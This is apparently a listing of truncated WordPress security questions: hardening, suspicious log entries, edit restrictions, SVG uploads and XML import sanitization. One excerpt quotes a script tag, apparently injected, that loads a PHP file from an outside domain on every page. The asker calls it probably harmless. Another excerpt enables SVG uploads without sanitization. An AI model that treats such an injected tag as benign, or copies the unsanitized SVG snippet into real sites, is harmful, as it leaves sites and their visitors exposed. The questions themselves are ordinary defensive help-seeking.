Articles of security

What is the highest security brake with WordPress and static files?

I want to build my sites with WordPress files that can't be modified and dirs where new files can't be added. Static content with permissions that do not allow execution, which will be served by another web server (that can't execute PHP code). Updates will be provided by changing the WordPress root and updating the database. I want to know […]

200 return code on 'POST /wp-admin/admin-ajax.php' while NOT logged in

I noticed the following log entry:

111.22.3.444 - - [13/Mar/2015:08:31:00 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 618 "https://cap5.nl/veiligheidstips-en-voorkom-hacken-van-je-wachtwoord/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36"

It is my company website and it is guaranteed that nobody (including me) was logged in or using the dashboard. Shouldn't a /wp-admin/.. POST return a 404 or 403 instead […]

Finding where a snippet of code is coming from

I recently noticed that a site that I work on is making a call to an outside website on every page load. The following code is showing on every page:

<script type="text/javascript" src="http://overtonenergy.com/fr4vvw8w.php?id=358757"></script> </head>

As you can see it's at the very bottom of the head. I don't think it's malicious as it just loads […]

RESTRICT EDIT of PHP files?

I wanted to restrict ALL Administrators from having access to EDIT any PHP file (like the theme+plugin editor AND ETC..). I have developed a plugin, named System Edit Restriction. Currently, I use this code to make the restriction:

define( 'DISALLOW_FILE_EDIT', true );
define( 'DISALLOW_FILE_MODS', true );
$restricted_places = array( 'widgets.php', 'widgets.php', 'user-new.php', 'upgrade-functions.php', 'upgrade.php', 'themes.php', 'theme-install.php', 'theme-editor.php', 'setup-config.php', 'plugins.php', 'plugin-install.php', 'options-head.php', 'network.php', 'ms-users.php', 'ms-upgrade-network.php', 'ms-themes.php', […]

Access log "POST /wp-login.php HTTP/1.0" 400

I'm looking at the access log and I found some lines such as:

IP - - [date and hour] "POST /wp-login.php HTTP/1.0" 400 …

What's the problem? Does someone want to hack my blog? How can I resolve it?

Can't reset WordPress password

I haven't logged onto my blog for years, and have, of course, forgotten the password. I click the 'Forgot' button and get a mail with a link, but that mail already says "Sorry, that key does not appear to be valid." and sends me round the loop again: click to reset, receive a mail, click the link […]

Allow SVG in WP step by step

I'm not strong in WP programming, but I am trying to understand what to do to enable SVG on my site. I found that I need to add the function below to functions.php:

/**
 * Add SVG capabilities
 */
function wpcontent_svg_mime_type( $mimes = array() ) {
    $mimes['svg']  = 'image/svg+xml';
    $mimes['svgz'] = 'image/svg+xml';
    return $mimes;
}
add_filter( 'upload_mimes', […]

How might I sanitize an XML file before WP Import? (Does WordPress verify or clean text when importing from an XML document?)

I have been tasked to import an older, offline WordPress site. I have the XML export file and a tarball of the file tree. Nothing has given me reason to worry, but does WP check the contents of the XML file as it imports it? Does it attempt to clean anything such as XSS attempts […]

WordPress security

I created a website for my customer with WordPress and uploaded it to their server. We assume the user has access to the whole server. Is it possible to protect this website from being used on another server, by protecting the admin password in the database from being edited, or by adding a script that requires my permission?

Webservice credential storage

This question already has an answer here: How to store username and password to API in WordPress option DB?